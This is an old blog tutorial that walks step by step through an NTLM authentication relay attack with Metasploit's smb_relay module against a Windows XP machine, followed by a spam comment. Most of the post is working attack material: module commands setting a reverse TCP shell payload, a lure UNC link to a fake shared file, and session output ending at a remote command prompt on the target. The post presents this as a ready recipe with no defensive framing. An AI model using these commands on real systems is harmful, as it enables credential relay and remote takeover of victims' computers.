Tuesday, September 28, 2010

Tutorial: NTLM Authentication Hijack with SMB Relay

Local Host: 192.168.1.252 (BackTrack 4 with Metasploit 3.x)
Target Host: 192.168.1.50 (Windows XP SP2 English)

Step 1: Prepare the SMB Exploit on Local Host

cd /pentest/exploits/msf3
./msfconsole

msf > use windows/smb/smb_relay
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set SRVHOST 192.168.1.252
msf > set LHOST 192.168.1.252
msf > set LPORT 443
msf > exploit

Step 2: Connect to the FAKE shared folder from the remote machine

\\192.168.1.252\shared\xxx.jpg

shared\xxx.jpg is a fake link

Step 3: Interact with the open session

Wait until you've got the connection from our target machine.
Once connected, wait for a few minutes, then press Enter.

Check the active sessions
msf > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell 192.168.1.252:443 -> 192.168.1.50:1118

Interact with active session# 1
msf > sessions -i 1

[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
Posted by at

1 comment:

  1. Saad AmirDecember 27, 2011 at 6:45 AM

    Your information to the student about the window designing option has very interesting for the student.
    Thanks....
    regards, saad from
    Education

    ReplyDelete

Subscribe to: Post Comments (Atom)